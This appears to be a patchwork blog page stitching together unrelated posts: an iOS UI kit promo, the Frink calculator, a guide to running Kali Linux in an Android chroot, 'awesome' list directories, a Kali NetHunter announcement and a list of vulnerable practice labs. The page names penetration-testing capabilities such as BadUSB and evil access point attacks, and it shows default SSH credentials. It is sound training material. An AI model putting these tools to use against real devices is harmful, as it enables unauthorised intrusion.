2. Ace iOS 8 Mobile UI Kit – $29

Ace iOS 8 Mobile UI Kit

It’s a well-organized mobile UI kit that includes 75 PSD, 300+ UI elements, 100+ icons and more. You can create over thousand different apps ensuring maximum versatility.

1. UI8 Ultimate Bundle – $348

Resources for every iOS developer - UI8 Ultimate Bundle

Frink – Frink is a practical calculating tool and programming language

About Frink

Frink is a practical calculating tool and programming language designed to make physical calculations simple, to help ensure that answers come out right, and to make a tool that’s really useful in the real world. It tracks units of measure (feet, meters, kilograms, watts, etc.) through all calculations, allowing you to mix units of measure transparently, and helps you easily verify that your answers make sense. It also contains a large data file of physical quantities, freeing you from having to look them up, and freeing you to make effortless calculations without getting bogged down in the mechanics.

Perhaps you’ll get the best idea of what Frink can do if you skip down to the Sample Calculations further on this document. Come back up to the top when you’re done.

Frink was named after one of my personal heroes, and great scientists of our time, the brilliant Professor John Frink. Professor Frink noted, decades ago:

“I predict that within 100 years, computers will be twice as powerful, ten thousand times larger, and so expensive that only the five richest kings of Europe will own them.”


For those with a short attention span like me, here are some of the features of Frink.

  • Tracks units of measure (feet, meters, tons, dollars, watts, etc.) through all calculations and allows you to add, subtract, multiply, and divide them effortlessly, and makes sure the answer comes out correct, even if you mix units like gallons and liters.
  • Arbitrary-precision math, including huge integers and floating-point numbers, rational numbers (that is, fractions like 1/3 are kept without loss of precision,) complex numbers, and intervals.
  • Advanced mathematical functions including trigonometric functions (even for complex numbers,) factoring and primality testing, and base conversions.
  • Unit Conversion between thousands of unit types with a huge built-in data file.
  • Date/time math (add offsets to dates, find out intervals between times,) timezone conversions, and user-modifiable date formats.
  • Translates between several human languages, including English, French, German, Spanish, Portuguese, Dutch, Korean, Japanese, Russian, Chinese, Swedish, and Arabic.
  • Calculates historical buying power of the U.S. dollar and British pound.
  • Calculates exchange rates between most of the world’s currencies.
  • Powerful Perl-like regular expression capabilities and text processing.
  • Supports Unicode throughout, allowing processing of almost all of the world’s languages.
  • Supports Interval Arithmetic (also known as Interval Computations) in calculations, allowing you to automagically calculate error bounds and uncertainties in all of your calculations.
  • Reads HTTP and FTP-based URLs as easily as reading local files, allowing fetching of live web-based data.
  • Runs on most major operating systems (anything with Java 1.1 or later,) as an applet, through a web-based interface, on a wireless Palm VII, on an HDML- or WML-based webphone, and on many mobile phones and hand-held devices.
  • Installs itself on your system in seconds using Java Web Start and automatically keeps itself updated when new versions of Frink are released.
  • Runs with a Graphical User Interface (Swing, AWT, and Android) or a command-line interface.
  • User interface has a Programming Mode which allows you to write, edit, save, and run extremely powerful programs even on a handheld device.
  • Frink has a simple but powerful system for drawing graphics which are resizable, support transparency and anti-aliasing, and can be printed or written to image files. Graphics can also have exact lengths, so that a 3-centimeter line is three centimeters long when printed.
  • Powers Frink Server Pages, a system for providing dynamic web pages powered by Frink.
  • Frink is a full-fledged programming language with arrays, dictionaries, sets, functions, loops, even object-oriented programming and self-evaluation.
  • Frink allows Object-Oriented Programming, which allows you to create complex data structures that are still easy to use.
  • Java Introspection layer allows you to call any Java code from within Frink.
  • Frink can also be embedded in a Java program, giving your Java programs all the power of Frink.
  • Did I mention it’s free? If you find it useful, please donate something. I’d really appreciate it!


Using Frink

Try as you read

If you want to try the calculations as you’re reading, click here to open the web-based interface in a new window. The web-based interface gives hints for new users, which may make it the easiest way to learn how to use Frink.

If you have a frames-enabled browser, and you don’t see a Frink sidebar to the left, you can also click here to try Frink in a sidebar as you read this. (The sidebar mode doesn’t give as many hints, though.)

Download using Java Web Start

This method of installation requires Java Web Start, which is installed with recent versions of Java. Using Java Web Start is used to be a great way to run Frink if you don’t need to run programs from the command-line. (But you can still write and run programs from the GUI using Java Web Start!) If you do want to run programs from the command-line, see the Downloading Frink section below. Java Web Start will allow you to automatically get the latest version of Frink and will update Frink automatically when new versions are available.

Installation Steps

  1. If you don’t have a recent version of Java, you can get it from Sun. (Link opens in new window.)
  2. (Optional) If you’ve never installed anything with Java Web Start, please read and understand the FAQ entry about the security warnings you’ll see (link opens in new window) and your alternate download options.
  3. Warning: If you’re using Java version 7u51 or later, they silently and incompatibly decided to change default security settings so you’ll need to open the Java Control Panel to allow Frink to run. Otherwise you will see a dialog that says something like “Application blocked by security settings” or “Your security settings have blocked a self-signed application from running.” (This silent change was made after 12+ years of the aforementioned method working fine.)The best way to allow Frink to run is to follow the instructions listed here and add to the exceptions list in step 7.

    Note: As always, Java’s instructions and installer are terrible, and the Java Control panel on Windows may actually be under your Start menu as Java |Configure Java, or under your Windows Control Panel, or if you start your Control Panel and don’t see it, Java’s control panel will be hidden under “32-bit Control Panel.” And sometimes you’ll have multiple versions of Java installed and the one that gets started isn’t the latest version. I had lots of problems until I manually uninstalled all the versions of Java on the Windows machine, reinstalled the latest version, and uninstalled Frink and reinstalled it. Sorry about that. Windows and Java integration is terrible.

  4. Click one of the options below to install Frink with either interface (see the screenshots below):

    You can install both, actually, with no problems.

If you’ve read those security notes, and understood what the security messages are telling you, and the warnings are still too scary, (and you don’t want to send me the $400 per year it would cost me to remove at least one of them,) and you’d rather download a limited version of Frink that runs in the most restrictive security sandbox (breaking some features), then click here to install a limited version of Frink. Again, please read those security notes to see what features will be unavailable if you choose this option. You can always get the full version of Frink later if you need those features.

If someone wants to send me the $400 necessary to get a VeriSign “Code Signing Cerificate”, I’ll sign it just for you. It won’t work any differently.)

If you have an old version of Java Web Start, Frink will probably show up in the “Downloaded Applications” section of the Java Web Start panel which isn’t immediately visible. Use the View menu option to select the Downloaded Applications tab. It will also let you create a Frink shortcut on your desktop or in your start menu. The defaults in Java Web Start before version 1.4.2 are set oddly so that the second time you run Frink, it will ask you if you want to make a shortcut.

If you’re using Linux, and Sun’s Java release, only Java version 1.5 beta and later will install shortcuts onto your desktop and start menu. Highly recommended.


More information aboutu Frink can be found on: and

Information about the Android App can be found here:


Kali Linux on any Android Phone or Tablet

Getting Kali Linux to run on ARM hardware has been a major goal for us since day one. So far, we’ve built native images for the Samsung Chromebook, Odroid U2, Raspberry Pi, RK3306, Galaxy Note 10.1, CuBox, Efika MX, and BeagleBone Black to name a few. This however does not mean you cannot install Kali Linux in a chroot on almost any modern device that runs Android. In fact, the developers of Linux Deployhave made it extremely easy to get any number of Linux distributions installed in a chroot environment using a simple GUI builder.

  • A device running Android 2.1 and above, rooted.
  • At least 5 GB free space on internal or external storage.
  • A fast, wireless internet connection.
  • Patience to wait for a distribution to bootstrap from the network.
Configuring Linux Deploy for Kali

There’s actually very little to be done to get Kali installed. By choosing Kali Linux in the “Distribution” tab, you’ve pretty much covered the important stuff. Optionally, you can choose your architecture, verify that the Kali mirror is correct, set your installation type and location on your Android device, etc. Generally speaking, the defaults provided by Linux Deploy are good to begin with.

Building the Kali Image


Once you are happy with all the settings, hitting the “install” button will start a Kali Linux bootstrap directly from our repositories. Depending on your Internet connection speed, this process could take a while. You’ll be downloading a base install of Kali Linux (with no tools) at minimum.

Starting up your chrooted Kali

Once the installation is complete, you can have Linux Deploy automatically mount and load up your Kali Linux chroot image. This also includes the starting of services such as SSH and VNC for easier remote access. All of this is automagically done by hitting the “start” button. You should see Linux Deploy setting up your image with output similar to the following:


At this stage, Linux Deploy has started a VNC and SSH server inside your chrooted Kali image. You can connect to the Kali session remotely using the IP address assigned to your Android device (in my case,

Logging in to your chrooted Kali

Now you can use either a SSH or VNC client to access your Kali instance. The VNC password is “changeme” and the SSH credentials are “android” for the username (configured via Linux Deploy) and “changeme” as the password.

muts@slim:~$ ssh android@
android@ password:
Linux localhost 3.4.5-447845 #1 SMP PREEMPT Fri Apr 12 17:22:34 KST 2013 armv7l
Kali GNU/Linux 1.0 [running on Android via Linux Deploy]
android@localhost:~$ sudo su
root@localhost:/home/android# df
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/loop3 4180944 667268 3304012 17% /
tmpfs 952708 80 952628 1% /dev
tmpfs 952708 0 952708 0% /dev/shm
root@localhost:/home/android# apt-get update
Hit kali Release.gpg
Hit kali Release
Hit kali/main Sources
Hit kali/contrib Sources
Hit kali/non-free Sources
Hit kali/main armel Packages
Hit kali/contrib armel Packages
Hit kali/non-free armel Packages
Ign kali/contrib Translation-en_US
Ign kali/contrib Translation-en
Ign kali/main Translation-en_US
Ign kali/main Translation-en
Ign kali/non-free Translation-en_US
Ign kali/non-free Translation-en
Reading package lists… Done
Image Size Considerations

If left unchanged, Linux Deploy will automatically set an image size of around 4 GB, for a “naked” installation of Kali. If you would like to install additional Kali tools down the road, you might want to consider using a larger image size, which is configurable via the settings in Linux Deploy.

Local VNC Connections

We had to try a couple of VNC clients to get one to work properly. Although controlling Kali through a local VNC client isn’t the most convenient of tasks, it certainly is possible. However, we suspect that most people will be SSH’ing into this instance. The picture below was overlayed with a Kali Linux desktop screenshot taken from a Galaxy S4.


Anyone fancy a simple smartphonehardware backdoor?

IRC Nachrichten per WhatsApp senden und empfangen

MASSIVE COLLECTIONS: Awesome, Awesome All, Awesome-Awesome, Awesome-Awesomes, Awesome Awesomeness, Awesome-Collection, Lists, Lists Of Github Lists, List of Lists, Must-Watch-List and Wiki China Lists


A curated list of awesome lists
For more info check:


Programming languages

Front-end development

Back-end development

Computer science

Big data



Awesome All

A curated list of all the awesome lists of awesome frameworks, libraries and software
For more info check:


Please take a quick gander at the contribution guidelines first. Thanks to all contributors; you rock!



A curated list of awesome curated lists! Inspired by inspiration.
For more info check:

Awesome Awesome

A curated list of amazingly awesome curated lists of amazingly awesome libraries, resources and shiny things for various languages and frameworks.
For more info check:



Common Lisp










Awesome collection of awesome lists of libraries, tools, frameworks and software for any programming language, or closely related :D
For more info check:

Feel free to add new lists or categories! Remember, it’s not mandatory that name starts with awesome- ;)

Programming languages | Frameworks, platforms, etc | Related and useful

Programming Languages


  • Awesome C – A curated list of awesome C libraries, frameworks and other shinies.


  • Awesome Clojure – A curated list of awesome clojure libraries and software

Common Lisp

  • Awesome Common Lisp – A curated list of awesome Common Lisp libraries, software and other shinies.


  • Awesome D – A curated list of awesome D documents, frameworks, libraries and software


  • Awesome Elixir – A curated list of amazingly awesome Elixir libraries, resources and shiny things



  • Awesome Go – A curated list of awesome Go frameworks, libraries and software


  • Awesome Haskell – A curated list of awesome Haskell frameworks, libraries and software



  • Awesome JavaScript – A curated list of amazingly awesome browser-side JavaScript libraries, resources and shiny things


  • Awesome PHP – A curated list of amazingly awesome PHP libraries, resources and shiny things


  • Awesome Python – A curated list of awesome Python frameworks, libraries and software



  • Awesome Scala – A curated list of awesome Scala frameworks, libraries and software

Frameworks, platforms, etc



  • Awesome Node.js – A curated list of astonishing Node.js frameworks, libraries and resources

Ruby on Rails

  • Awesome Rails – A curated list of amazingly awesome open source rails related resources


Related and useful



  • Awesome Dev Env – A curated list of awesome tools, resources and workflow tips making an awesome development environment.


  • Awesome Shell – A curated list of awesome command-line frameworks, toolkits, guides and gizmos


  • Awesome Sysadmin – A curated list of amazingly awesome open source sysadmin resources


  • Awesome Talks – List of online talks that you would love to watch


  • Awesome Machine Learning – A curated list of awesome machine learning frameworks, libraries and software (by language).


  • Awesome Awesomes – This one!! ;) Awesome collection of awesome lists of libraries, tools, frameworks and software for any programming language :D
  • Awesome Awesomeness – A curated list of awesome awesomeness
  • Awesome Awesome – A curated list of awesome curated lists! Inspired by inspiration

Awesome Awesomeness

A curated list of amazingly awesome awesomeness. Also available on:
And Github:

Awesome Awesome

A curated list of awesome curated lists of many topics, can also found on:

Computer management

  • awesome-shell – Command-line frameworks, toolkits, guides and gizmos.
  • awesome-sysadmin – Backups, configuration management, DNS, IMAP/POP3, LDAP, monitoring, SSH, statistics, troubleshooting, virtualization, VPN and more.

Data processing

Programming languages

  • awesome-clojure – Package management, audio, HTTP, database, websocket and testing.
  • awesome-c – C frameworks, libraries, resources and other cool stuff.
  • awesome-cpp – C/C++ frameworks, libraries, and resources.
  • awesome-cobol – Web frameworks, template engine, forms, authentication & OAuth, database, e-mail, messaging, imagery, text processing, machine learning, testing, audio, video and logging.
  • awesome-common-lisp – Common Lisp frameworks, libraries, resources and other shinies.
  • awesome-d – Build tools, compilers, IDE, GUI, database clients.
  • awesome-elixir – Elixir libraries, resources and shiny things.
  • awesome-go – Go frameworks, libraries and software.
  • awesome-java – Build tool, code analysis, database, GUI, IDE, JSON, machine learning, PDF, science, testing and web crawling.
  • awesome-javascript – JavaScript libraries, resources and shiny things.
  • awesome-julia – List of Julia resources and packages.
  • awesome-perl – Benchmarks, databases, images, logging, profiling, testing, text processing and web frameworks.
  • awesome-php – Frameworks, templating, URL, e-mail, files, imagery, testing, security, documentation, geolocation, date, PDF, search and authentication.
  • awesome-python – Files, dates, text processing, NLP, imagery, audio, video, geolocation, web frameworks, OAuth, web crawling, networking, GUI, game development, testing, science and data analysis and machine learning.
  • [awesome-R] – Not yet! Do it yourself!
  • awesome-ruby – Ruby libraries, tools, frameworks and software
  • awesome-scala – Scala frameworks, libraries and software.
  • awesome-swift – Swift documentation, projects, tutorials, updates, etc


  • [awesome-biology] – Not yet! Do it yourself!
  • [awesome-chemistry] – Not yet! Do it yourself!
  • [awesome-geography] – Not yet! Do it yourself!
  • [awesome-math] – Not yet! Do it yourself!
  • [awesome-physics] – Not yet! Do it yourself!

Web browsers

  • [awesome-firefox] – Not yet! Do it yourself!


  • [awesome-github] – Not yet! Do it yourself!
  • [awesome-flickr] – Not yet! Do it yourself!
  • [awesome-twitter] – Not yet! Do it yourself!
  • awesome-wikipedia – Datasets, frameworks, libraries and other software related to Wikipedia.
  • [awesome-youtube] – Not yet! Do it yourself!

Web platforms


  • [awesome-music] – Not yet! Do it yourself!


a list of awesome repos
For more info check:

awesome lists

  • Awesome – A curated list of awesome lists
  • awesome-all – A curated list of awesome lists of awesome frameworks, libraries and software
  • awesome-awesome by @emijrp – A curated list of awesome curated lists of many topics.
  • awesome-awesome by @erichs – A curated list of awesome curated lists! Inspired by inspiration.
  • awesome-awesome by @oyvindrobertsen – A curated list of curated lists of libraries, resources and shiny things for various languages.
  • awesome-awesomeness – A curated list of awesome awesomeness
  • awesome-awesomes – Awesome collection of awesome lists of libraries, tools, frameworks and software for any programming language
  • lists – The definitive list of (awesome) lists curated on GitHub. (comment: No awesome, but more awesome)

Programming languages



The definitive list of (awesome) lists curated on GitHub.
For more info check:
List of useful, silly and awesome lists curated on GitHub. Contributions welcome!




Lists of lists

  • awesome – A curated list of awesome lists.
  • awesome-all – A curated list of awesome lists of awesome frameworks, libraries and software
  • awesome-awesome by @emijrp – A curated list of awesome curated lists of many topics.
  • awesome-awesome by @erichs – A curated list of awesome curated lists! Inspired by inspiration.
  • awesome-awesome by @oyvindrobertsen – A curated list of curated lists of libraries, resources and shiny things for various languages.
  • awesome-awesomeness – A curated list of awesome awesomeness
  • awesome-awesomes – Awesome collection of awesome lists of libraries, tools, frameworks and software for any programming language
  • awesome-collection – A list of awesome repos.
  • ListOfGithubLists – List of github lists
  • list-of-lists – A meta list of lists of useful open source projects and developer tools.
  • must-watch-list – List of must-watch lists.
  • this one
  • wiki In Chinese – A curated list of awesome lists.

Lists of lists of lists

Lists of lists of lists of lists

Lists of lists of lists of lists of lists

List of github lists

Creating a github list is so trendy nowadays, so here’s another one.
Fore more info check:

Pull requests are welcome



A meta list of lists of useful open source projects and developer tools
For more info check:


Frameworks / Libraries


Other lists of lists



A list of must-watch lists
For more info check:

Overview of all lists from this post:
Awesome All:
Awesome Awesome:
Awesome Awesome:
List Of Github Lists:
Wiki China Lists:

Awesome-Awesomeness (zeef):

Kali Linux NetHunter on Android devices for Nexus and OnePlus.

For over a year now, Offensive Security have obsessively been building Kali on weird and wonderful ARM hardware and today, we are proud to reveal our latest creation – the Kali Linux NetHunter. NetHunter is a Android penetration testing platform for Nexus and OnePlus devices built on top of Kali Linux, which includes some special and unique features. Of course, you have all the usual Kali tools in NetHunter as well as the ability to get a full VNC session from your phone to a graphical Kali chroot, however the strength of NetHunter does not end there.

They have incorporated some amazing features into the NetHunter OS which are both powerful and unique. From pre-programmed HID Keyboard (Teensy) attacks, to BadUSB Man In The Middle attacks, to one-click MANA Evil Access Point setups. And yes, NetHunter natively supports wireless 802.11 frame injection with a variety of supported USB NICs. NetHunter is still in its infancy and they are looking forward to seeing this project and community grow.


Supported Devices

The Kali NetHunter image is currently compatible with the following Nexus and OnePlus devices:
-Nexus 4 (GSM) – “mako”
-Nexus 5 (GSM/LTE) – “hammerhead”
-Nexus 7 [2012] (Wi-Fi) – “nakasi”
-Nexus 7 [2012] (Mobile) – “nakasig”
-Nexus 7 [2013] (Wi-Fi) – “razor”
-Nexus 7 [2013] (Mobile) – “razorg”
-Nexus 10 (Tablet) – “mantaray”
-OnePlus One 16 GB – “bacon”
-OnePlus One 64 GB – “bacon”

More Info can be found on:

Info about the OnePluse One can be found on:

Penetration Testing Practice Lab – Vulnerable Apps / Systems (The Most Complete List)

A complete mindmap about all the courses and trainings from this post can be found here:

Following table gives the URLs of all the vulnerable web applications, operating system installations, old software and war games [hacking] sites. The URLs for individual applications that are part of other collection entities were not given as it is not necessary to download each of them and manually configure them if they are already available in a configured state. For technologies used in each web application, please refer to the mindmap above.

Vulnerable Web Applications:
OWASP Hackademic:
OWASP SiteGenerator:
OWASP Bricks: &
OWASP Security Shepherd:
Damn Vulnerable Web App (DVWA):
Damn Vulnerable Web Services (DVWS):
Butterfly Security Project:
Foundstone Hackme Bank:
Foundstone Hackme Books:
Foundstone Hackme Casino:
Foundstone Hackme Shipping:
Foundstone Hackme Travel:
WackoPicko: &
WebSecurity Dojo:
BodgeIt Store:
Exploit KB Vulnerable Web App: &
PHDays iBank CTF:
Drunk Admin Web Hacking Challenge:
bWAPP: & &
NOWASP / Mutillidae 2:
Project GameOver:
OWASP Vicnum Project: &
Hackademic Challenges:

Vulnerable Operating System Installations:
Damn Vulnerable Linux: &
Metasploitable: &
UltimateLAMP: &
heorot: DE-ICE, hackerdemia
DE-ICE, hackerdemia:
DE-ICE, hackerdemia:
DE-ICE, hackerdemia:
DE-ICE, hackerdemia:
De-ICE HackerPedia PenTest LiveCDs
pWnOS: & &
Holynix: &
exploit-exercises – nebula, protostar, fusion:
PenTest Laboratory:
RebootUser Vulnix:
SecGame # 1 Sauron:
Pentester Lab:
TurnKey Linux:
Elastic Server:
Virtual Hacking Lab:

Sites for Downloading Older Versions of Various Software:
Old Version:
Old Apps:
VirtualHacking Repo:

Sites by Vendors of Security Testing Software:
Acunetix acuforum:
Acunetix acublog:
Acunetix acuart:
Cenzic crackmebank:
HP freebank:
IBM altoromutual:
Mavituna testsparker:
Mavituna testsparker:
NTOSpider Test Site:

Sites for Improving Your Hacking Skills:
Exploit Exercises:
Google Gruyere:
Gh0st Lab:
Hack This Site:
Hacker Challenge:
Hacker Test:
hACME Game:
Root Me:
Security Treasure Hunt:
Smash The Stack:
TheBlackSheep and Erik:
XSS – Can You XSS This?:
XSS – ProgPHP:

CTF Sites / Archives:
CTFtime (Details of CTF Challenges):
shell-storm Repo:

Mobile Apps:
ExploitMe Mobile Android Labs:
ExploitMe Mobile iPhone Labs:
OWASP iGoat:
OWASP Goatdroid:
Damn Vulnerable iOS App (DVIA):
Damn Vulnerable Android App (DVAA):
Damn Vulnerable FirefoxOS Application (DVFA):
NcN Wargame:
Hacme Bank Android: